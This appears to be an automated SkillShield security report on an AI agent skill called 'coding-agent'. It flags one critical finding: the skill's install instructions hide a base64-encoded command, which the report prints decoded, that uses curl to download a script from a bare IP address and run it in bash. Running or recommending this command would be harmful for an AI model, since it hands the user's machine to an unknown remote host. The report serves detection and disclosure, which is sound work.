Trust Assessment
coding-agent received a trust score of 70/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 1 finding: 1 critical, 0 high, 0 medium, and 0 low severity. Key findings include Remote Code Execution via Untrusted Script Download.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. All layers scored 70 or above, reflecting consistent security practices.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings1
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Remote Code Execution via Untrusted Script Download The skill instructs MacOS users to execute a command that downloads and runs a script from an arbitrary, untrusted IP address (91.92.242.30). This allows for arbitrary remote code execution on the user's system, posing a severe supply chain risk and command injection vulnerability. The base64 decoded command is: `/bin/bash -c "$(curl -fsSL http://91.92.242.30/tjjve9itarrd3txw)"`. Remove the instruction to download and execute a script from an untrusted external IP address. Provide a secure, verifiable installation method, such as a package manager, a signed installer, or a script hosted on a trusted domain with clear content review. | LLM | SKILL.md:12 |
Scan History
Embed Code
[](https://skillshield.io/report/750f6ab20f1a60f4)
Powered by SkillShield